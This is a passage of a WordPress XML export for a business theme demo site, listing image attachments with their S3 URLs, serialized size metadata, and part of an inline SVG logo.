		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/signature-home3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:204;s:6:"height";i:52;s:4:"file";s:27:"2020/11/signature-home3.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"signature-home3-150x52.png";s:5:"width";i:150;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/image1-home3/</link>
		<pubDate>Tue, 03 Nov 2020 10:23:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1607</wp:post_id>
		<wp:post_date><![CDATA[2020-11-03 10:23:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-03 10:23:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image1-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:430;s:4:"file";s:24:"2020/11/image1-home3.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-home3-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home3-570x400.jpg";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/image2-home3/</link>
		<pubDate>Wed, 04 Nov 2020 07:17:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1624</wp:post_id>
		<wp:post_date><![CDATA[2020-11-04 07:17:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-04 07:17:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image2-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:24:"2020/11/image2-home3.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home3-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image2-home3-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image2-home3-959x600.jpg";s:5:"width";i:959;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image3-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/image3-home3/</link>
		<pubDate>Wed, 04 Nov 2020 09:36:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image3-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1635</wp:post_id>
		<wp:post_date><![CDATA[2020-11-04 09:36:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-04 09:36:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image3-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image3-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image3-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:664;s:4:"file";s:24:"2020/11/image3-home3.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"image3-home3-300x104.jpg";s:5:"width";i:300;s:6:"height";i:104;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"image3-home3-1024x354.jpg";s:5:"width";i:1024;s:6:"height";i:354;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image3-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image3-home3-768x266.jpg";s:5:"width";i:768;s:6:"height";i:266;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"image3-home3-1536x531.jpg";s:5:"width";i:1536;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image3-home3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"image3-home3-1200x664.jpg";s:5:"width";i:1200;s:6:"height";i:664;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-values-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-core-values/chart-values-home3/</link>
		<pubDate>Thu, 05 Nov 2020 03:49:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-values-home3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1662</wp:post_id>
		<wp:post_date><![CDATA[2020-11-05 03:49:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-05 03:49:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-values-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-values-home3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart-values-home3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:30:"2020/11/chart-values-home3.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"chart-values-home3-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"chart-values-home3-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home3-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home3-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-project-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/chart-project-home3/</link>
		<pubDate>Thu, 05 Nov 2020 07:30:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1691</wp:post_id>
		<wp:post_date><![CDATA[2020-11-05 07:30:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-05 07:30:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-project-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-project-home3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:31:"2020/09/chart-project-home3.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:31:"chart-project-home3-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"chart-project-home3-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"chart-project-home3-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"chart-project-home3-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart1-service-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/chart1-service-home3/</link>
		<pubDate>Thu, 05 Nov 2020 07:57:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1701</wp:post_id>
		<wp:post_date><![CDATA[2020-11-05 07:57:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-05 07:57:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart1-service-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart1-service-home3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:466;s:6:"height";i:296;s:4:"file";s:32:"2020/11/chart1-service-home3.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:32:"chart1-service-home3-300x191.png";s:5:"width";i:300;s:6:"height";i:191;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart1-service-home3-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>img-btn-pdf-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/img-btn-pdf-home3/</link>
		<pubDate>Thu, 05 Nov 2020 08:16:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1705</wp:post_id>
		<wp:post_date><![CDATA[2020-11-05 08:16:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-05 08:16:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[img-btn-pdf-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/img-btn-pdf-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:90;s:4:"file";s:29:"2020/11/img-btn-pdf-home3.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"img-btn-pdf-home3-150x90.jpg";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bannner-widget-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/bannner-widget-home3/</link>
		<pubDate>Thu, 05 Nov 2020 08:51:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bannner-widget-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1744</wp:post_id>
		<wp:post_date><![CDATA[2020-11-05 08:51:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-05 08:51:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bannner-widget-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bannner-widget-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bannner-widget-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:300;s:4:"file";s:32:"2020/11/bannner-widget-home3.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"bannner-widget-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>favicon-red</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/favicon-red/</link>
		<pubDate>Wed, 02 Dec 2020 10:09:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/favicon-red.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1761</wp:post_id>
		<wp:post_date><![CDATA[2020-12-02 10:09:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-02 10:09:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[favicon-red]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/favicon-red.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/favicon-red.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:56;s:6:"height";i:56;s:4:"file";s:23:"2020/12/favicon-red.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/03_white/</link>
		<pubDate>Mon, 28 Dec 2020 07:36:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1933</wp:post_id>
		<wp:post_date><![CDATA[2020-12-28 07:36:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-28 07:36:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/03_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop  offset="2.012780e-07" style="stop-color:#F45555"/>
	<stop  offset="1" style="stop-color:#D92300"/>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1
	s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0
	c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2
	c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4
	c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2
